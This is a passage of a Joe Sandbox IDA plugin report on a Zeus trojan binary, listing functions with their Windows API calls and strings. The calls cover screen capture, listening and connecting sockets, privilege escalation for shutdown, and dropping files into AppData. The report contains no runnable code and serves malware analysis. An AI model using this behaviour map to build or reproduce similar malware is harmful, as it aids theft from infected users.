Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B5BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,003C30F6), ref: 003B5C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,003C30F6), ref: 003B5C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,003C30F6), ref: 003B5C1C

Part of subcall function 003B54A9: GetWindowInfo.USER32(?,?), ref: 003B5515
Part of subcall function 003B54A9: IntersectRect.USER32(?,?,-00000114), ref: 003B5538
Part of subcall function 003B54A9: IntersectRect.USER32(?,?,-00000114), ref: 003B558E
Part of subcall function 003B54A9: GetDC.USER32(00000000), ref: 003B55D2
Part of subcall function 003B54A9: CreateCompatibleDC.GDI32(00000000), ref: 003B55E3
Part of subcall function 003B54A9: ReleaseDC.USER32(00000000,00000000), ref: 003B55ED
Part of subcall function 003B54A9: SelectObject.GDI32(00000000,?), ref: 003B5602
Part of subcall function 003B54A9: DeleteDC.GDI32(00000000), ref: 003B5610
Part of subcall function 003B54A9: TlsSetValue.KERNEL32(?), ref: 003B565B
Part of subcall function 003B54A9: EqualRect.USER32(?,?), ref: 003B5675
Part of subcall function 003B54A9: SaveDC.GDI32(00000000), ref: 003B5680
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B569B
Part of subcall function 003B54A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 003B56BB
Part of subcall function 003B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 003B56CD
Part of subcall function 003B54A9: RestoreDC.GDI32(00000000,?), ref: 003B56E4
Part of subcall function 003B54A9: SaveDC.GDI32(00000000), ref: 003B5706
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003B571C
Part of subcall function 003B54A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 003B5735
Part of subcall function 003B54A9: RestoreDC.GDI32(00000000,?), ref: 003B5743
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003B5756
Part of subcall function 003B54A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 003B5766
Part of subcall function 003B54A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 003B5778
Part of subcall function 003B54A9: TlsSetValue.KERNEL32(00000000), ref: 003B5792
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B57B2
Part of subcall function 003B54A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 003B57CE
Part of subcall function 003B54A9: SelectObject.GDI32(00000000,?), ref: 003B57E4
Part of subcall function 003B54A9: DeleteDC.GDI32(00000000), ref: 003B57EB
Part of subcall function 003B54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 003B5813
Part of subcall function 003B54A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 003B5829

SetEvent.KERNEL32(003D2868,?,00000001), ref: 003B5C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 003B5C76

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B0B3
ReleaseMutex.KERNEL32(?), ref: 0040B0E7
IsWindow.USER32(?), ref: 0040B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 0040B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 0040B110

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BB0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003BB0B3
ReleaseMutex.KERNEL32(?), ref: 003BB0E7
IsWindow.USER32(?), ref: 003BB0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 003BB108
SendMessageW.USER32(?,00000215,00000000,?), ref: 003BB110

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C040D, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217

APIs

Part of subcall function 003C6973: getsockname.WS2_32(?,?,?), ref: 003C6991

Part of subcall function 003C636E: recv.WS2_32(?,?,00000001,00000000), ref: 003C6392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 003C04DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 003C0515

Part of subcall function 003C64FD: socket.WS2_32(00000000,00000001,00000006), ref: 003C6506
Part of subcall function 003C64FD: bind.WS2_32(00000000,?,-0000001D), ref: 003C6526
Part of subcall function 003C64FD: listen.WS2_32(00000000,?), ref: 003C6535
Part of subcall function 003C64FD: #3.WS2_32(00000000,?,003B4C21,7FFFFFFF,?,00000000,00000080), ref: 003C6540

Part of subcall function 003C672E: accept.WS2_32(00000000,00000000,00000001), ref: 003C6754

Part of subcall function 003C6403: socket.WS2_32(?,00000001,00000006), ref: 003C640C
Part of subcall function 003C6403: connect.WS2_32(00000000,?,-0000001D), ref: 003C642C
Part of subcall function 003C6403: #3.WS2_32(00000000), ref: 003C6437

Part of subcall function 003C67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 003C67CC

Part of subcall function 003C65B7: recv.WS2_32(?,?,00000400,00000000), ref: 003C6600
Part of subcall function 003C65B7: #19.WS2_32(?,?,00000000,00000000), ref: 003C661A
Part of subcall function 003C65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 003C6657

Part of subcall function 003C675E: shutdown.WS2_32(?,00000002), ref: 003C6766
Part of subcall function 003C675E: #3.WS2_32(?), ref: 003C676D

Part of subcall function 003C0397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 003C03BB
Part of subcall function 003C0397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 003C03CA

Strings

<M;, xrefs: 003C0655, 003C061C, 003C056B
[, xrefs: 003C054E

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004098B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040996B

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

&, xrefs: 0040994A
#, xrefs: 00409951

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00409009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 004174DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407194,?,?,00000104,.exe,00000000), ref: 004174F4
Part of subcall function 004174DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000104), ref: 00417575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 004090BB

Part of subcall function 00418AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00418B23
Part of subcall function 00418AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418B4A
Part of subcall function 00418AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00418B94
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00418BC1
Part of subcall function 00418AE4: Sleep.KERNEL32(00000000,?,?), ref: 00418BF1
Part of subcall function 00418AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00418C1F
Part of subcall function 00418AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00418C31

Part of subcall function 004133BB: HeapFree.KERNEL32(00000000,00000000,00414BB2), ref: 004133CE

Strings

#, xrefs: 00409093
&, xrefs: 004090A1

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B98B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 003C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,003B7194,?,?,00000104,.exe,00000000), ref: 003C74F4
Part of subcall function 003C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003B7194,?,?,00000104), ref: 003C7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 003B991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003B996B

Part of subcall function 003C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 003C8B23
Part of subcall function 003C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C8B4A
Part of subcall function 003C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 003C8B94
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 003C8BC1
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 003C8BF1
Part of subcall function 003C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 003C8C1F
Part of subcall function 003C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 003C8C31

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

&, xrefs: 003B994A
#, xrefs: 003B9951

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B9009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 003C74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,003B7194,?,?,00000104,.exe,00000000), ref: 003C74F4
Part of subcall function 003C74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,003B7194,?,?,00000104), ref: 003C7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 003B906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 003B90BB

Part of subcall function 003C8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 003C8B23
Part of subcall function 003C8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003C8B4A
Part of subcall function 003C8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 003C8B94
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 003C8BC1
Part of subcall function 003C8AE4: Sleep.KERNEL32(00000000,?,?), ref: 003C8BF1
Part of subcall function 003C8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 003C8C1F
Part of subcall function 003C8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 003C8C31

Part of subcall function 003C33BB: HeapFree.KERNEL32(00000000,00000000,003C4BB2), ref: 003C33CE

Strings

&, xrefs: 003B90A1
#, xrefs: 003B9093

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00417A14, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 00417AB5

Strings

Local\, xrefs: 00417A9A
p.B, xrefs: 00417A41
Global\, xrefs: 00417A91

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C7A14, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 003C7AB5

Strings

p.=, xrefs: 003C7A41
Local\, xrefs: 003C7A9A
Global\, xrefs: 003C7A91

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C65B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58

APIs

recv.WS2_32(?,?,00000400,00000000), ref: 003C6600
#19.WS2_32(?,?,00000000,00000000), ref: 003C661A
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 003C6657

Strings

<M;, xrefs: 003C65B7

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00412828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 004135C6: MultiByteToWideChar.KERNEL32(00412884,00000000,?,00411FF2,?,7718F8FF,00412884,00000000,00000032,?,7718F8FF,00000000), ref: 004135DD

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

Strings

SOFTWARE\Microsoft, xrefs: 00412855
C:\Users\admin\AppData\Roaming, xrefs: 00412870, 00412888
.dat, xrefs: 0041289B

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C2828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 003C35C6: MultiByteToWideChar.KERNEL32(003C2884,00000000,?,003C1FF2,?,7718F8FF,003C2884,00000000,00000032,?,7718F8FF,00000000), ref: 003C35DD

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 003C28A1

Strings

.dat, xrefs: 003C289B
SOFTWARE\Microsoft, xrefs: 003C2855
C:\Users\admin\AppData\Roaming, xrefs: 003C2870, 003C2888

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003BE0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 003BE108
GetThreadDesktop.USER32(00000000), ref: 003BE10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 003BE128

Part of subcall function 003BDD09: TlsAlloc.KERNEL32(003D2868,00000000,0000018C,00000000,00000000), ref: 003BDD22
Part of subcall function 003BDD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 003BDD4A
Part of subcall function 003BDD09: CreateEventW.KERNEL32(003D2C30,00000001,00000000,?,84889912,?,00000001), ref: 003BDD74
Part of subcall function 003BDD09: CreateMutexW.KERNEL32(003D2C30,00000000,?,18782822,?,00000001), ref: 003BDD97
Part of subcall function 003BDD09: CreateFileMappingW.KERNEL32(00000000,003D2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 003BDDC2
Part of subcall function 003BDD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 003BDDD8
Part of subcall function 003BDD09: GetDC.USER32(00000000), ref: 003BDDF5
Part of subcall function 003BDD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 003BDE15
Part of subcall function 003BDD09: GetDeviceCaps.GDI32(?,0000000A), ref: 003BDE1F
Part of subcall function 003BDD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 003BDE32
Part of subcall function 003BDD09: ReleaseDC.USER32(00000000,?), ref: 003BDE56
Part of subcall function 003BDD09: CreateMutexW.KERNEL32(003D2C30,00000000,?,1898B122,?,00000001,003D28B8,?,00000102,003D28A4,003D2E70,00000010,?,?), ref: 003BDF00
Part of subcall function 003BDD09: GetDC.USER32(00000000), ref: 003BDF15
Part of subcall function 003BDD09: CreateCompatibleDC.GDI32(00000000), ref: 003BDF23
Part of subcall function 003BDD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 003BDF3A
Part of subcall function 003BDD09: SelectObject.GDI32(00000000,00000000), ref: 003BDF4D
Part of subcall function 003BDD09: ReleaseDC.USER32(00000000,00000001), ref: 003BDF65

Part of subcall function 003BDF74: DeleteObject.GDI32(00000000), ref: 003BDF87
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDF97
Part of subcall function 003BDF74: TlsFree.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFA2
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDFB0
Part of subcall function 003BDF74: UnmapViewOfFile.KERNEL32(00000000,00000000,003D2868,00000000,003BE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 003BDFBA
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BDFC7
Part of subcall function 003BDF74: SelectObject.GDI32(00000000,00000000), ref: 003BDFE1
Part of subcall function 003BDF74: DeleteObject.GDI32(00000000), ref: 003BDFF2
Part of subcall function 003BDF74: DeleteDC.GDI32(00000000), ref: 003BDFFF
Part of subcall function 003BDF74: CloseHandle.KERNEL32(00000000), ref: 003BE010
Part of subcall function 003BDF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003BE01F
Part of subcall function 003BDF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 003BE038

Strings

N, xrefs: 003BE132

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 00405ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(004225D0), ref: 00405F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00405F23

Part of subcall function 004189C2: PathSkipRootW.SHLWAPI(0041CA1A), ref: 004189CD
Part of subcall function 004189C2: GetFileAttributesW.KERNEL32(0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 004189F5
Part of subcall function 004189C2: CreateDirectoryW.KERNEL32(0041CA1A,00000000,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 00418A03

Part of subcall function 00416A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,0041C745,00000000), ref: 00416A5B
Part of subcall function 00416A3C: GetSecurityDescriptorSacl.ADVAPI32(0041C745,?,?,?,?,?,0041C745,?), ref: 00416A77
Part of subcall function 00416A3C: SetNamedSecurityInfoW.ADVAPI32(0041C745,00000001,00000010,00000000,00000000,00000000,?), ref: 00416A8E
Part of subcall function 00416A3C: LocalFree.KERNEL32(0041C745,?,?,0041C745,?), ref: 00416A9D

GetFileAttributesW.KERNEL32(004223C8,004225D0,004225D0,00000000,00020000,004069C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00405F46

Part of subcall function 00412828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 004128A1

Strings

.tmp, xrefs: 00405F1D

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 0040F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040F3CC

Part of subcall function 0041D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D34A
Part of subcall function 0041D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0041D35D
Part of subcall function 0041D325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0041D39B
Part of subcall function 0041D325: CharToOemW.USER32(?,?), ref: 0041D3B7
Part of subcall function 0041D325: CharToOemW.USER32(?,?), ref: 0041D3C6
Part of subcall function 0041D325: ExitProcess.KERNEL32(00000000), ref: 0041D41C

Part of subcall function 0040E959: CreateMutexW.KERNEL32(00422C30,00000000,00422A60,?,?,00404E69,?,?,?,743C152E,00000002), ref: 0040E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 0040F3DF

Part of subcall function 00414A87: GetCurrentThread.KERNEL32(00000020,00000000,?,00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A97
Part of subcall function 00414A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414A9E
Part of subcall function 00414A87: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,00416A4F,SeSecurityPrivilege,00000000,?,?,0041C745,?), ref: 00414AB0
Part of subcall function 00414A87: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00414AD4
Part of subcall function 00414A87: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 00414AE9
Part of subcall function 00414A87: GetLastError.KERNEL32 ref: 00414AF3
Part of subcall function 00414A87: CloseHandle.KERNEL32(?), ref: 00414B02

Strings

, xrefs: 0040F383
SeShutdownPrivilege, xrefs: 0040F3AB

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004189C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(0041CA1A), ref: 004189CD
GetFileAttributesW.KERNEL32(0041CA1A,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 004189F5
CreateDirectoryW.KERNEL32(0041CA1A,00000000,?,C:\Users\admin\AppData\Roaming,0041CA4A,C:\Users\admin\AppData\Roaming), ref: 00418A03

Strings

C:\Users\admin\AppData\Roaming, xrefs: 004189C2, 004189C8

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 004187C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 004187D7

Part of subcall function 004146F4: GetTickCount.KERNEL32(00418766,?), ref: 004146F4

Part of subcall function 004140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 004140CF

Part of subcall function 00418C40: PathCombineW.SHLWAPI(00411F45,00411F45,?), ref: 00418C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00418829

Strings

%s%08x, xrefs: 004187F2
tmp, xrefs: 004187ED

Memory Dump Source

Source File: 00000000.00000002.1645918669.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1645909254.00400000.00000002.sdmp
Associated: 00000000.00000002.1645953626.00422000.00000004.sdmp
Associated: 00000000.00000002.1645978095.00425000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003C87C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 003C87D7

Part of subcall function 003C46F4: GetTickCount.KERNEL32(003C8766,?), ref: 003C46F4

Part of subcall function 003C40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 003C40CF

Part of subcall function 003C8C40: PathCombineW.SHLWAPI(003C1F45,003C1F45,?), ref: 003C8C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 003C8829

Strings

%s%08x, xrefs: 003C87F2
tmp, xrefs: 003C87ED

Memory Dump Source

Source File: 00000000.00000002.1645884622.003B0000.00000040.sdmp, Offset: 003B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_Zeus_binary_4d08934bd040ed25dfa46542e396cb05.jbxd

Function 003B5ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(003D25D0), ref: 003B5F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 003B5F23

Part of subcall function 003C89C2: PathSkipRootW.SHLWAPI(?), ref: 003C89CD
Part of subcall function 003C89C2: GetFileAttributesW.KERNEL32(?,?,00000000,003CD261,?,?,?,?,?), ref: 003C89F5
Part of subcall function 003C89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,003CD261,?,?,?,?,?), ref: 003C8A03

Part of subcall function 003C6A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 003C6A5B
